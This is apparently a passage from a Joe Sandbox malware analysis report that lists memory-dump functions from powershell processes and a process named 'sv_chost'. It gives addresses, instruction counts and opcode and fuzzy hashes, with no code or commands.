                                                                Function 00007FFD9B776660 Relevance: 1.6, Strings: 1, Instructions: 395COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2284366690.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_7ffd9b770000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: X7,r
                                                                • API String ID: 0-2313384186
                                                                • Opcode ID: d09c30be62281b74eb94829e988263c9277e4dd6eff007fcd75d567d57741e4d
                                                                • Instruction ID: 9aa0b2499d208c12526e624d7beca4a7d9cbeef3689c1cd1094538ef0b199b5e
                                                                • Opcode Fuzzy Hash: d09c30be62281b74eb94829e988263c9277e4dd6eff007fcd75d567d57741e4d
                                                                • Instruction Fuzzy Hash: EFC14732B0EB8E4FEBA5EBA848A59B57B91EF15314B0902FED44DC70FBD954E8058341
                                                                Function 00007FFD9B6A644D Relevance: .7, Instructions: 729COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2281456242.00007FFD9B6A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_7ffd9b6a0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9fffbe6563fe343c08fed45d91534b0af6491552e28cbc8a6081e3da177d5cc3
                                                                • Instruction ID: 24eed49537d41b3fd34e60cc80e1a7b00fbcbf7e8f28573350d4530a8d6efc6c
                                                                • Opcode Fuzzy Hash: 9fffbe6563fe343c08fed45d91534b0af6491552e28cbc8a6081e3da177d5cc3
                                                                • Instruction Fuzzy Hash: 61D17F31A18A4D8FDF94DF5CC4A5AA9BBE1FF68300F15416AD41DDB2A6CA34F841CB81
                                                                Function 00007FFD9B6AA0D3 Relevance: .2, Instructions: 198COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2281456242.00007FFD9B6A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_7ffd9b6a0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e68c14051dcff05d1abb4288e8f3566e9392a6fb39684ef9ed6fe4d962eb563b
                                                                • Instruction ID: ab3e9dd2a17e59c60269ba9727bb16bfdb6033aa1b45bd1d08d3c83f33a6d2aa
                                                                • Opcode Fuzzy Hash: e68c14051dcff05d1abb4288e8f3566e9392a6fb39684ef9ed6fe4d962eb563b
                                                                • Instruction Fuzzy Hash: FD114C6650E7CD4FDB539B2888690A47FB0EF13214B0A02EBD498CF0B3DA196909C762
                                                                Function 00007FFD9B58E620 Relevance: .1, Instructions: 127COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2280074223.00007FFD9B58D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B58D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_7ffd9b58d000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 88582579ba3276e2ae136a48589b1fed28e81475e712f9adedfdc62bd7b10b37
                                                                • Instruction ID: 54772409aa49d5010abd9ed8291f8261132fc1f0111568d773f4a7944ed35428
                                                                • Opcode Fuzzy Hash: 88582579ba3276e2ae136a48589b1fed28e81475e712f9adedfdc62bd7b10b37
                                                                • Instruction Fuzzy Hash: AD41267140EFC44FE7979B29E8559523FF0EF52320B1A05DFD088CB1A3D625A846C7A2
                                                                Function 00007FFD9B6A9789 Relevance: .1, Instructions: 110COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2281456242.00007FFD9B6A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_7ffd9b6a0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4548d9b1e1190000c71b51384d76af427f77e449de226907b646a9deb7607599
                                                                • Instruction ID: 3ebf8760c6e0be89834494aacb7d3567f4d0b7315b9212e2f681388082173e71
                                                                • Opcode Fuzzy Hash: 4548d9b1e1190000c71b51384d76af427f77e449de226907b646a9deb7607599
                                                                • Instruction Fuzzy Hash: F0318130A1CA4C9FDB1CDB5CA84A6A9BBE0FB99311F00422FE45993251CB70A8558BC2
                                                                Function 00007FFD9B6AA62C Relevance: .1, Instructions: 99COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2281456242.00007FFD9B6A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_7ffd9b6a0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 86996eedd0b03693bc9e35093a8bce0cece7cc0eea225386cbf9005f75011ab8
                                                                • Instruction ID: e5037ad34da5db96ea7cd1103d2b0c574710264d80f6537a825649f763e7d82d
                                                                • Opcode Fuzzy Hash: 86996eedd0b03693bc9e35093a8bce0cece7cc0eea225386cbf9005f75011ab8
                                                                • Instruction Fuzzy Hash: 6F21E63190CB4C4FDB59DFAC984A7E97BF0EB96321F04416FD048C7152DA74A416CB92
                                                                Function 00007FFD9B6A33B5 Relevance: .0, Instructions: 49COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2281456242.00007FFD9B6A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_7ffd9b6a0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                • Instruction ID: 53de6e4c5396b4e1d5081cbe3b058e8ded2e7a225d5593b99a771fed33ddcd29
                                                                • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                • Instruction Fuzzy Hash: 6B01A73020CB0C4FDB48EF0CE051AA5B3E0FB89324F10056DE58AC36A1DA32E882CB41
                                                                Function 00007FFD9B77414D Relevance: .0, Instructions: 37COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2284366690.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_7ffd9b770000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0af9669a7916e631a71e9048823bc9070780c28ef617ca43d179c9ec3c6d7376
                                                                • Instruction ID: ac2814f907a2218ba79ea0220bd3ba23e2a708820b51f04576d7f7f4b66fc505
                                                                • Opcode Fuzzy Hash: 0af9669a7916e631a71e9048823bc9070780c28ef617ca43d179c9ec3c6d7376
                                                                • Instruction Fuzzy Hash: 15F0BE32B0E6098FD768EA4CE4918E873E4EF55330B1201BAE06DC75B3CA25EC41C741
                                                                Function 00007FFD9B774400 Relevance: .0, Instructions: 35COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2284366690.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_7ffd9b770000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 21a6e1eaba764bb566ad23324f5d11bc5016e698301296568a48b83c42c900f1
                                                                • Instruction ID: 74f229b1b7cc6dc323ed212656293c6c1d2d7eb1480a1df8b04937984bdc8680
                                                                • Opcode Fuzzy Hash: 21a6e1eaba764bb566ad23324f5d11bc5016e698301296568a48b83c42c900f1
                                                                • Instruction Fuzzy Hash: 4FF05E32B0E6498FD768EA5CE4A58A877E0FF4532176600FAE159CB4B3DA25AC41C750
                                                                Function 00007FFD9B7741D1 Relevance: .0, Instructions: 29COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2284366690.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_7ffd9b770000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                • Instruction ID: 24c58a666106ab8d29d881880e0c4af9a426807c3d90cd99f549e1067edd05cb
                                                                • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                • Instruction Fuzzy Hash: ADE01A31B1C9089FDA78EA4CE0919AD73E5EB98331B1202BBD14EC7571CA22ED518B81

                                                                Non-executed Functions

                                                                Function 00007FFD9B6A8BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2281456242.00007FFD9B6A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6A0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_7ffd9b6a0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: M_^4$M_^7$M_^F$M_^J
                                                                • API String ID: 0-622050427
                                                                • Opcode ID: 0952385b8bdb8dc4856a798c81327935ad6e11df2551058c8feb274a0171bac6
                                                                • Instruction ID: 77295835d202f0da54c8a331038727f56b3a87eefd150163892bcd4c6e8218f8
                                                                • Opcode Fuzzy Hash: 0952385b8bdb8dc4856a798c81327935ad6e11df2551058c8feb274a0171bac6
                                                                • Instruction Fuzzy Hash: 4D21CFA77085699ED3067B7DA8149EA3740CF946747C947F2E1AACF093FD2860878AD0

                                                                Executed Functions

                                                                Function 00007FFD9B766660 Relevance: .4, Instructions: 395COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000013.00000002.2543979339.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_19_2_7ffd9b760000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9acb98b324ec2d91306157d313e173f5d1894e3596b0d897634da53063827cb5
                                                                • Instruction ID: 85146286229ca02568cdf0d0911073b98a89372bfa33a3280c4567dbca9549fb
                                                                • Opcode Fuzzy Hash: 9acb98b324ec2d91306157d313e173f5d1894e3596b0d897634da53063827cb5
                                                                • Instruction Fuzzy Hash: 1CC14772B0EB8E8FEBA5AAA898655B57BD1EF51310F4902BED44DC70F7D914E801C342
                                                                Function 00007FFD9B69A104 Relevance: .2, Instructions: 249COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000013.00000002.2542563232.00007FFD9B695000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B695000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_19_2_7ffd9b695000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f6c914b6d5695f640bf18e9a98b92575e7308961d677ab6e9aafc3af8d425490
                                                                • Instruction ID: d137fe7e3b4695c56d062d7e21d3f57c7b43698f82fb193aaaf0acb70614e383
                                                                • Opcode Fuzzy Hash: f6c914b6d5695f640bf18e9a98b92575e7308961d677ab6e9aafc3af8d425490
                                                                • Instruction Fuzzy Hash: C611EC6A90F7CD4FDB539B6858790A47FB0EE67214B0A00EBD498CF1B3D5196908C792
                                                                Function 00007FFD9B764073 Relevance: .2, Instructions: 186COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000013.00000002.2543979339.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_19_2_7ffd9b760000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e88cd8a0840109c90904563be6155fb480f89fb96d740296cfb9b52fb572434e
                                                                • Instruction ID: d1c55b0fbfa6fc0be4848074a3771d78113a89233deeb6d8c532061c6f970c36
                                                                • Opcode Fuzzy Hash: e88cd8a0840109c90904563be6155fb480f89fb96d740296cfb9b52fb572434e
                                                                • Instruction Fuzzy Hash: C8512722B0EB4A8FE7A9DA5C446257477D2EF95310F5A02BEC05DC71B7DE14EC058342
                                                                Function 00007FFD9B764370 Relevance: .1, Instructions: 148COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000013.00000002.2543979339.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_19_2_7ffd9b760000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 268c209c02c90f324e76b4e36ae37be85b97cc45ca67a6e005d883c6270fff58
                                                                • Instruction ID: b6c4d7b6570db9fe69f7d15f788f3701751d92715cdb72ef66b6512e5711bc80
                                                                • Opcode Fuzzy Hash: 268c209c02c90f324e76b4e36ae37be85b97cc45ca67a6e005d883c6270fff58
                                                                • Instruction Fuzzy Hash: 37412632B0EB498FEBA9D66C94619B47BD1EF41720B0902BED059C70B7EA14AD118342
                                                                Function 00007FFD9B699750 Relevance: .1, Instructions: 144COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000013.00000002.2542563232.00007FFD9B695000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B695000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_19_2_7ffd9b695000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 19cdf4fadf96c2477bd348ce8570af2df988ac590b6d667b97af0b021d89ae58
                                                                • Instruction ID: fe4744f26dd48e95044e487ea1403752fe8dfdf528aad0423ce3474765d81bbf
                                                                • Opcode Fuzzy Hash: 19cdf4fadf96c2477bd348ce8570af2df988ac590b6d667b97af0b021d89ae58
                                                                • Instruction Fuzzy Hash: 60412A7190DB884FDB199F5C9C1A6B97FE1FB96310F0441AFD499C7292CA64B805CBC2
                                                                Function 00007FFD9B57E7E0 Relevance: .1, Instructions: 129COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000013.00000002.2541032909.00007FFD9B57D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B57D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_19_2_7ffd9b57d000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d370c481a0f6cd02ab3d3f3766cc008397fa2772dae5ef0a81c50d3c8a3d3916
                                                                • Instruction ID: cb9f20826182e31c7e3ae20fc2790fe9a984eb74abaae932f0752096edea07d8
                                                                • Opcode Fuzzy Hash: d370c481a0f6cd02ab3d3f3766cc008397fa2772dae5ef0a81c50d3c8a3d3916
                                                                • Instruction Fuzzy Hash: 4741277090EBC44FE7978B3998559523FF4EF56320B1A05EFD088CB1A3D629A846C792
                                                                Function 00007FFD9B69B8DC Relevance: .1, Instructions: 115COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000013.00000002.2542563232.00007FFD9B695000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B695000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_19_2_7ffd9b695000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 50006c9f5375722b12c40571c9cb90d685a0b81e25fa38415bce383199724a4d
                                                                • Instruction ID: 10daa5bba2d82030b46d7a8ccf08b9d5b11b767f46a0013e38e3bc7e4019107e
                                                                • Opcode Fuzzy Hash: 50006c9f5375722b12c40571c9cb90d685a0b81e25fa38415bce383199724a4d
                                                                • Instruction Fuzzy Hash: 6331E531A0DB4C8FDB59DF9CC8497E97BE0EB9A321F0441AFD059C7162D674A806CB91
                                                                Function 00007FFD9B7640BF Relevance: .1, Instructions: 99COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000013.00000002.2543979339.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_19_2_7ffd9b760000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2e85dbd6348188d6fd640f1ed86f0f341d2ca2aaed7738d4ca1a4a16d0474d21
                                                                • Instruction ID: b33dd293c9b2000fceb62ab69e73d5dfdb2e52864538ba49f8dc790ce765a22c
                                                                • Opcode Fuzzy Hash: 2e85dbd6348188d6fd640f1ed86f0f341d2ca2aaed7738d4ca1a4a16d0474d21
                                                                • Instruction Fuzzy Hash: 9621C062F0EB8A8FE7B99A58846217476D2EF50310F5A02BED05DC75B2DE18EC058302
                                                                Function 00007FFD9B7643BC Relevance: .1, Instructions: 64COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000013.00000002.2543979339.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_19_2_7ffd9b760000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 16780407648675f5ac1506751e597f9dba75a20577007f34240429a4887846a1
                                                                • Instruction ID: 4ba531a0a89871b32d1aaa2210db467034be80c4c4d647060c7c658e3d65c017
                                                                • Opcode Fuzzy Hash: 16780407648675f5ac1506751e597f9dba75a20577007f34240429a4887846a1
                                                                • Instruction Fuzzy Hash: 3D11CE32A0F64A8FE7B5DB6884759B87AD1EF40320B4A02BED05DC70B7DA18AD008342
                                                                Function 00007FFD9B6933B5 Relevance: .0, Instructions: 49COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000013.00000002.2542563232.00007FFD9B690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B690000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_19_2_7ffd9b690000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                • Instruction ID: 1b5accfc9599bf43c69ba9d6bd2a67115dc506e1efe0f693a81a39f3d74253e9
                                                                • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                • Instruction Fuzzy Hash: B201A73020CB0C4FDB48EF0CE051AA5B3E0FB89324F10056DE58AC36A1DA32E882CB41

                                                                Non-executed Functions

                                                                Function 00007FFD9B698BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000013.00000002.2542563232.00007FFD9B695000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B695000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_19_2_7ffd9b695000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: N_^8$N_^<$N_^?$N_^J$N_^K$N_^N$N_^Q$N_^Y
                                                                • API String ID: 0-2388461625
                                                                • Opcode ID: 9fbcb04bfe035fe85d9bc315c2e0a04bc0a348d1a00b88d828a9925e65419bb9
                                                                • Instruction ID: 4f2339344e560c8e7e644bdb295f787c40fc409af2f06b43f14f1d324749db2f
                                                                • Opcode Fuzzy Hash: 9fbcb04bfe035fe85d9bc315c2e0a04bc0a348d1a00b88d828a9925e65419bb9
                                                                • Instruction Fuzzy Hash: B621F673B085254AC30637BCBC619D97B81DF5477838941F3E229CF593ED24A48B8782

                                                                Executed Functions

                                                                Function 00007FFD9B6B1679 Relevance: .8, Instructions: 847COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000018.00000002.2620991857.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_24_2_7ffd9b6b0000_sv_chost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 24baac98ac7648beb3f5141265facd498e14ad2035bfc94d12d58948dbfcafe4
                                                                • Instruction ID: 5738cf2b826af6780b0f777294e2d200a287feb820f238418f9963ad09981c3b
                                                                • Opcode Fuzzy Hash: 24baac98ac7648beb3f5141265facd498e14ad2035bfc94d12d58948dbfcafe4
                                                                • Instruction Fuzzy Hash: AB421921B2C9194FE7A8FB6C84796B977E1FF98300F940579E05DC72DADE28B8418741
                                                                Function 00007FFD9B6B16B9 Relevance: .7, Instructions: 675COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000018.00000002.2620991857.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_24_2_7ffd9b6b0000_sv_chost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 26c1f79a7e072250fc73cf660795a0532d24cb4f9b5f964b080ea73a44c47d61
                                                                • Instruction ID: a7176a95976dc459775278f0763f6024f3e2695b1a156b18f0f248df53da7fde
                                                                • Opcode Fuzzy Hash: 26c1f79a7e072250fc73cf660795a0532d24cb4f9b5f964b080ea73a44c47d61
                                                                • Instruction Fuzzy Hash: 43222721B2D9194FE7A8FB6C84796B977E1FF98300F8505B9E05DC72DACD28B8418781
                                                                Function 00007FFD9B6B204D Relevance: .2, Instructions: 192COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000018.00000002.2620991857.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_24_2_7ffd9b6b0000_sv_chost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 278a5efec6d21262a420bb0f5a5f83df14069330f99de13a13298967e1bb9055
                                                                • Instruction ID: ed29eb807fa02e3e7fb80bbfe8711bdcce5525835bd3c9169888367b1d1429af
                                                                • Opcode Fuzzy Hash: 278a5efec6d21262a420bb0f5a5f83df14069330f99de13a13298967e1bb9055
                                                                • Instruction Fuzzy Hash: 7F510F10B1E6C90FDBA6ABB858756757FE1DF97215B0800FAE0ADCB1E7DD086806C342
                                                                Function 00007FFD9B6B1190 Relevance: .6, Instructions: 582COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000018.00000002.2620991857.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_24_2_7ffd9b6b0000_sv_chost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fb254221645c6ecfaf6c9de86b138b60b91249d4626ab54357689d3c0aa5c78b
                                                                • Instruction ID: 0ac7d6a796bb7524918532d927bdba4c7cde6362f0241d364425977326b2b409
                                                                • Opcode Fuzzy Hash: fb254221645c6ecfaf6c9de86b138b60b91249d4626ab54357689d3c0aa5c78b
                                                                • Instruction Fuzzy Hash: AE31D663A1E69E4FEB05A7A898B14E97BB1EF41310B4940F7C0A9DF1E3DD2839068750
                                                                Function 00007FFD9B6B0C2E Relevance: .2, Instructions: 217COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000018.00000002.2620991857.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_24_2_7ffd9b6b0000_sv_chost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 936d2019b737ab20b0df7f9b4f07cdff1c9b381b2e9aa3724f4828ce924811e3
                                                                • Instruction ID: 686ee6d6ffe6c8b4b847ec4952a835693604e5cc228ce2358e5039c0fbd8c9cb
                                                                • Opcode Fuzzy Hash: 936d2019b737ab20b0df7f9b4f07cdff1c9b381b2e9aa3724f4828ce924811e3
                                                                • Instruction Fuzzy Hash: 2B512611B4FAC90FE766977848256797FE1DF86214B0940FBD49CCB1EBDD18AC468342
                                                                Function 00007FFD9B6B0AC9 Relevance: .2, Instructions: 150COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000018.00000002.2620991857.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_24_2_7ffd9b6b0000_sv_chost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: faf2f40c0251578aa259acc45d328de03d0b00cf884c20214ab8213e68604fcc
                                                                • Instruction ID: d25355d04417021d17a2d0a570400a42777ecc2cb5de6eda1eb2a77d9e34634e
                                                                • Opcode Fuzzy Hash: faf2f40c0251578aa259acc45d328de03d0b00cf884c20214ab8213e68604fcc
                                                                • Instruction Fuzzy Hash: E141F921B1991D4FEB44B7AC58697BE77D2EF98701F5042B6E01DC72D7DD2868018781
                                                                Function 00007FFD9B6B0558 Relevance: .1, Instructions: 134COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000018.00000002.2620991857.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_24_2_7ffd9b6b0000_sv_chost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 52e47a0311e3c2892518f4e08ea8f5a0c77405a33cbf44eb2376614bc9275b33
                                                                • Instruction ID: f21a8b39a8d8fcaa3203d4612980b4afd3b1e534cc4e1691273b46a64c4b8e44
                                                                • Opcode Fuzzy Hash: 52e47a0311e3c2892518f4e08ea8f5a0c77405a33cbf44eb2376614bc9275b33
                                                                • Instruction Fuzzy Hash: D0310621B1C94D0FE798EB6C947A67867C2EF98305F4401BEE45EC32E7DD64AC418341
                                                                Function 00007FFD9B6B0985 Relevance: .1, Instructions: 111COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000018.00000002.2620991857.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_24_2_7ffd9b6b0000_sv_chost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a73a73b0545dc19b913abe3f808ae5ee68cf3d43adbee73d3e21614df84f214c
                                                                • Instruction ID: e4428753e2c33bca9d87c4774e207577097b8a168ca3f8f8fe97fc6836c957ff
                                                                • Opcode Fuzzy Hash: a73a73b0545dc19b913abe3f808ae5ee68cf3d43adbee73d3e21614df84f214c
                                                                • Instruction Fuzzy Hash: 6231B131B18A098FDB44FBACC8756ED77A1FF98300F9145B5D019C729ADE38A8418B40
                                                                Function 00007FFD9B6B082D Relevance: .1, Instructions: 106COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000018.00000002.2620991857.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_24_2_7ffd9b6b0000_sv_chost.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
